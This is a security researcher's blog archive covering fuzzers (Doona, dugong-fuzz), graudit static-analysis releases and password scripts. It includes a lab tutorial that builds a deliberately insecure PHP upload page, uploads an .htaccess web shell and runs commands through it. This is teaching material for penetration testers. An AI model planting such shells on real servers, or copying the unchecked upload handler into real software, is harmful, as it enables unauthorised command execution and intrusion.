Results tagged “project” from Just Another Hacker

Doona - network protocol fuzzer

Doona is a fork of the Bruteforce Exploit Detector, it was renamed to avoid confusion as it has a large number of of changes. You should get a copy from github if you want to try it:

It's currently a little short on documentation, so I will let the changelog details some of the many differences between Doona and BED:

[ 0.7 ]
- resolved the need for a hardcoded plugin list
- added max requests option to allow parallel execution (easier than hacking in thread support)
- added sigpipe handler to prevent silent exit if server unexpectedly closes the connection
- added http proxy module
- added more ftp test cases
- added more rtsp test cases
- added more http test cases
- added more irc test cases
- fixed a long standing BED bug where two test strings where accidentally concatenated
- fixed a long standing BED bug where a hex representation of a 32bit integer was not max value as intended
- aliased -m to -s (-s is getting deprecated/reassigned)
- renamed plugins to modules (-m is for module)
- removed directory traversal testing code from ftp module
- rewrote/broke misc testing procedure to test specific edge cases, needs redesign
- added support for multiple setup/prefix/verbs, ie: fuzzing Host headers with GET/POST/HEAD requests
- fixed long standing BED bug in the smtp module where it wouldn't greet the mail server correctly with HELO
- added more smtp test cases
- fixed long standing BED bug in escaped Unicode strings
- added more large integer and formatstring fuzz strings
- fixed column alignment in the progress output

[ 0.6 first doona release ]
- added rtsp module
- added tftp module
- added whois module
- added more irc test cases
- added more finger test cases
- added more http test cases
- added more ftp test cases
- added progress indicator count to fuzz cases
- added resume feature (uses test case number)
- added crash indicators for test case number
- added signal handlers (displays testcase number on crtl^c or kill)
- added feature to dump what a test case number would send
- ftp module now uses anonymous login if username password not provided
- changed the order test cases are executed to allow corner cases to be tested earlier
- changed diagnostic output
- new and improved help text
- some code cleanup

htshells tutorial

Here is a quick tutorial on how to use the .htaccess shell attack. I did this on a backtrack 5 vm, the upload example is loosely based on ( The first thing we do is create our vulnerable "application", like this:

root@bt:/var/www# mkdir htshells
root@bt:/var/www# cd htshells/
root@bt:/var/www/htshells# chmod 777 .
root@bt:/var/www/htshells# cat > index.html

<form action="upload_file.php" method="post"
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />

root@bt:/var/www/htshells# cat > upload_file.php
if ($_FILES['file']['error'] > 0)
  echo "Error: ".$_FILES['file']['error']."<br />";
  echo "Upload: ".$_FILES['file']['name']."<br />";
  echo "Type: ".$_FILES['file']['type']."<br />";
  echo "Size: " . ($_FILES['file']['size'] / 1024) . " Kb<br />";
  echo "Stored in: ".$_FILES['file']['tmp_name']."<br />";
  if (file_exists($_FILES['file']['name']))
      echo $_FILES['file']['name']." already exists.";
      echo "Moved to: ".$_FILES['file']['name'];
Next we have to change the apache configuration, as backtrack comes with secure defaults.
root@bt:/var/www# vim /etc/apache2/sites-enabled/000-default 
Change the AllowOverride argument to all under the /var/www directory configuration
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
Then start apache
root@bt:/var/www/htshells# apache2ctl start
Next we grab and prepare our payload:
root@bt:/var/www/htshells# cd /root
root@bt:~# wget
--2011-06-01 20:16:16--
Connecting to||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 536 [text/plain]
Saving to: `htaccess.php'

100%[========================================================================================>] 536         --.-K/s   in 0s      

2011-06-01 20:16:18 (53.1 MB/s) - `htaccess.php' saved [536/536]

root@bt:~# mv htaccess.php .htaccess

Next we visit our demo application in the browser

Select the file to upload (you might have to right click and select show hidden files)

Submit the file for upload
upload success.png

Now visit the .htaccess file and start running some commands:
root@bt:/var/www/htshells# GET http://localhost/htshells/.htaccess?c=id
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul -

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
    Order allow,deny
    Allow from all

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted 
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
###### LLEHS ######
Well April sped past like a bullet. I missed updates to the blog as I migrated to yet another hosting provider. By now I have done it so many times that the core shift only takes about 10 minutes work and some rsync commands. As usually I forget a few bits and pieces. If you have had any email bounces to me then please resend to the usual wireghoul address.

So here is a quick roundup of April:
  • was the April addition to Jason
  • Graudit gets closer to 2.0 release
  • My first 2011 advisory went out (JAHx111)
  • No April tutorial happened.
And that is it for April. For the remainder of May there will be another update to Jason, two tutorials, more graudit updates, one or more advisories and if you're going to AusCERT and want to catch up for a beer/coffee let me know!

Known hash replay attack

The use of client side password hashing in web application (such as may be on the rise. At least it appears that way to me as I have seen several deployments lately.

These hashing libraries usually promises to keep a user's password secure in non ssl environments.
One could argue that they perform the intended task. The problem with http traffic compared to https is that the traffic is obtainable by anyone else connected to the same network as the user (or the server). If an attacker obtains the hashed password string he or she can provide the hash to the server to authenticate as the user without knowing the users actual password.

This does mean that the user's plaintext password is safe until the hacker breaks it so for users who use the same password everywhere, there is a marginal protection when websites use hashed passwords. It's still a far cry from the relative security of submitting sensitive data over a SSL encrypted connection.

The March addition to Jason is, a script which iterates numeric values in passwords.
~/Jason$ ./ password1

You can grab a copy from the github project page:

Left or right handed passwords

Are you left or right handed? How about your password? English based passwords seem to be predominantly left handed. Although I haven't done the proper analysis I suspect it's simply due to the left hand side of the keyboard containing more of the "higher" letter frequency of the Englih language (AERTSD) and the lower number range, which also seems to be favoured over the upper number range.

The February password addition to Jason is, a script which meassures left/right hand usage when entering a password.
~/Jason$ echo -e "123456\npassword\nqwerty\naaaa\nLLLL\n" | ./ -
Handiness! Calculates hand use in passwords. 1 is 100% left hand -1 is right hand
0.833333333333333  123456
0.5   password
0.666666666666667  qwerty
1     aaaa
-1    LLLL

You can grab a copy from the github project page:


Tamperdata is a Firefox extension that lets you intercept HTTP requests and modify the data should you wish to do so. It also comes with some penetration testing macros readily available to make your work a little easier. Tamperdata can also be used for other purposes and once you're finished using it you can export the web requests to xml files. The perl module WWW::TamperData is an interface to these tamperdata xml files.

You can find the latest version on CPAN.

Password length matters

In fact, it matters so much that the term password is just plain wrong. Passphrase is better, and I did mean to start using that term instead. When it comes to user education things are often hard to quantify, but looking at the recent password breaches the message doesn't seem to register.
The issue is compounded by a users habit of having a single password and using it everywhere. As their password is used and re-used all over work, home and the internet it needs to meet the password criteria of several "password policies". Luckily for us that means that most users have a password of 6-8 characters, usually containing one or more numbers.

I won't go too much into detail about password length, but suffice to say that you should ditch your password and go for a passphrase instead. I would also recommend that you don't make it a simple sentence, but rather something obscure like your grandfathers address combined with the name of your cousins pet rabbit. That should ensure it's not too easy to crack using a dictionary attack.

This months password tool is It will split a dictionary file into several smaller files based on number of characters in the file;
root@bt:~/Jason# ./ /mnt/hgfs/Tools/wordlists/Trek
Sorting 530 passwords by length
Finished 6.txt
Finished 11.txt
Finished 3.txt
Finished 7.txt
Finished 9.txt
Finished 12.txt
Finished 15.txt
Finished 14.txt
Finished 8.txt
Finished 4.txt
Finished 13.txt
Finished 10.txt
Finished 5.txt

You can download the script from

Graudit 1.9 released

The next graudit version is already out! There were some serious issues with the 1.8 release that needed fixing.
  • Fixed php (php/xss.db) database which had a blank line at the end, causing everything to match. (Thx @jodymelbourne)
  • Added test case for blank lines in signature scripts
  • Added database validating aux script
  • Updated Makefile file manifest
  • Fixed bug in test script template (t/

Big thanks to the people who contributed with patches, bug reports and feedback. Keep them coming!

You can download the latest version from the graudit download page.

Graudit 1.8 released

The next (long overdue) graudit version is out! Just in time for those who wants to do some hacking during the holidays.
  • -L operator does vim friendly line numbers
  • Man pages and documentation updates
  • PHP signature updates
  • JSP signature updates
  • Dotnet signature updates
  • Perl signature updates and bug fixes
  • Python signature updates
  • Bug fixes for aux/ scripts
  • More aux/ scripts
  • Fixed ignore CVS directories by default

Package maintainers should note that graudit now has a man page. The install section of the Makefile does not currently place it anywhere, so please patch for the appropriate location. I will add more distro neutral updates to the makefile for next release.This release fixes some of the broken whitespace neutral rules I added last release. For the perl users, I'm sorry.

Big thanks to the people who contributed with patches, bug reports and feedback. Keep them coming!

You can download the latest version from the graudit download page.
Happy christmas!


dugong.jpgDugong-fuzz is a simple genetic file fuzzer written in perl6 using the rakudo star early adopters release. It uses an simple genetic approach to mangle the "X and Y bits" or two parent files to produce a new file (a child). This is adopted from a similar qbasic file I had for pmars (core wars) back in the days.

Dugong-fuzz pays tribute to the gentle sea cow by the same name. You can find out more from wikipedia.

The dugong-fuzz project is available from github and you will need rakudo perl or another perl6 implementation to run it.

Custom graudit signatures

Writing your own graudit signatures is relatively easy. Mastering regular expressions can be helpful, but in their simplest form a list of words will do. I have tried to document some of the common pitfalls that might creep up on you in my Ruxmon presentation, but I know how "useful" a single slide can be. I am catching up on graudit documentation and signatures is just around the corner. Until then, I thought I would share with you some of the databases I use when looking for low hanging fruit and want to reduce the information overload (noise) that you normally get from the php ruleset. Signatures after the break to avoid spamming rss readers.

Playing with Fuzzdb

I suppose this could be called a tool review, as fuzzdb is a very useful collection of strings. I have played with fuzzdb before, in fact it was always my intention to write WWW::TamperData so I could leverage fuzzdb for specific penetration testing in the deep webs. The next release of TamperData should be functional for that, albeit, some elbow grease will be required.

Adrian Crenshaw of irongeek fame has inspired me to start yet another project based on fuzzdb. If you haven't already done so, grab yourself a copy right now from
It is time for another graudit release, and this time it includes some big changes.
  • New PHP signatures
  • Improved C signatures for fewer false positives
  • Improved dotnet signatures
  • Whitespace neutrality for all signatures
  • -l operator lists available databases
  • -x operator for excluding files
  • configure script added to make chain
  • Makefile install targets changed, install is now server wide
Package maintainers should take note of the last change. The make file currently supports the old style home directory install (make user install), but that is deprecated and will be dropped as ./configure --prefix /home/user/bin --dbdir /home/user/.graudit;make install does the same thing.
I have also added some scripts from my talks, you can find them in the aux directory. There are no install rules for them so they are only available from within the graudit-1.7_src tarball. My thanks to the people who contributed with patches and bug reports, keep them coming.

You can download the latest version from the graudit download page.
After a short hiatus I am happy to deliver the next graudit release. Version 1.6 introduces three new databases, c, dotnet and "all". The all database is a combined database of all the distributed signatures so you can easier scan multi language projects. The rough database has also been deprecated. As usual there are some new features, bug fixes and signature tweaks, see the changelog for the full details.

You can download the latest version from the graudit download page.
Please note that with the current changes to the test suite there is no development (.src.tar.gz) release. If you are a package maintainer or otherwise wish to use the development release you can either clone the git repository or wait for the upcoming 1.7 release.

Graudit version 1.4 released

This will be a short lived release, it's actually more like 1.5RC1. Anyway, there are some improvements to the PHP signatures so if you really can't wait until the start of December for version 1.5, then grab a copy from the graudit download page.

Graudit, reducing false positives

Some anon called "R" left a comment today, but it was on a page where I had accidentally left comments on, so I won't publish it. He complained about false positives in graudit, and it is not the first time I have head this, or seen it for that matter. So I thought I would address it publicly, R's comment was;

"graudit seems to trip on things like "update_profile(", proudly hilighting "file(" :)"

This is true (I mostly see it around function names containing mail) and I would very much like to correct all the false positives matches and avoid any false negative ones too for that matter. However, this is a hobby project for me. I am not a company selling software, nor am I paid or given time off by my employer to work on graudit. Therefore my contribution to the project very much depends on my real life activities.

Graudit is meant to be a rough auditing tool. You run it against large/new projects so you can pick some starting points for your audit or even spot some low hanging fruit. It is not a complete solution and cannot validate whether what it highlights is exploitable or not. Since it uses grep it saves me from spending time on parsing engines for the supported languages, but it does make it harder to write signatures that are completely free of false positives. Regular expressions aren't that great for parsing :(

However, it is opensource, feel free to fix the issue and submit a patch, otherwise you will probably have to wait for version 1.5+ before any radical changes to the signatures happen. Until then I guess you will have to live with some false positives.

Graudit lightning talk

I will present a graudit lightning talk at the 2009 AISA Annual Seminar Day.
As a result I will aim to release new  versions more often, so I can present more bells and whistles. Expect graudit to version 1.6 by Christmas 2009!

For the full 2009 AISA ASD agenda please see

What is graudit?
Graudit is a semantic static analys tool that highlights potential vulnerabilities in source code.

Who should use graudit?
System administrators, developers, auditors, vulnerability researchers and anyone else that cares to know if the application they develop, deploy or otherwise use is secure.

What languages are supported?
Version 1.5 Shipped with support for the following languages:
  • ASP
  • JSP
  • Perl
  • PHP
  • Python
  • Other (looks for suspicious comments, etc)
Can you add support for language x,y,z?
I can add support for almost any language, but if I don't program in the language myself it is likely to have a high false-positive or even false-negative rate. If you can point me to an existing set of rules for a language I can convert these to graudit.

Can I help?
Sure you can! I could use help with anything and everything, improved rulesets, documentation, packaging, testing, etc. And if you're unable to help with any of these you can tell someone else about graudit.

Download graudit

Please use the links below to download your preferred graudit release. We recommend that you use the latest release, or even stay up to date by using our github repository.

Latest version:
1c0e8954e8b205915ad9bb698b43611f graudit-1.9.tar.gz
bc7d05f29c87fc21fa3d16da690aead1 graudit-1.9_src.tar.gz

Older versions;
9b63cf2c003ce3b0be730a77150e1aeb  graudit-1.8.tar.gz
5001669ee9c1c6f5fa670a031d8041ef  graudit-1.8_src.tar.gz
b40ef6d7c2de0b17bcdcfa8f863c24aa  graudit-1.7.tar.gz
89bb69911cebf49bc52c172388232705  graudit-1.7_src.tar.gz
5f43b14b3af77f5af7e02fc549bcf4b3  graudit-1.6.tar.gz
1b6b255e8a384faec9e4f6a20179ad9d  graudit-1.5.tar.gz
0cbf01f09f1b84c6b3dd7dec78ba5784  graudit-1.5_src.tar.gz
291545462e89943aed26637047e78dc8  graudit-1.4.tar.gz
71297a09bd5c378826acc91e44baceb3  graudit-1.3.tar.gz
dd513e8663ab1bcfe61a034823c75d8f  graudit-1.2.tar.gz
a4a8937481a71f27df85bd7cd9ec2d25  graudit-1.1.tar.bz2

Graudit version 1.3 released

The latest version of Graudit is here, version 1.3. The most exiting news about this release is the added support for ASP and JSP. That's right, Graudit now supports 5 languages.
There are also some new signatures and bug fixes for the existing rules.

You can obtain the latest version from the graudit download page.
No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.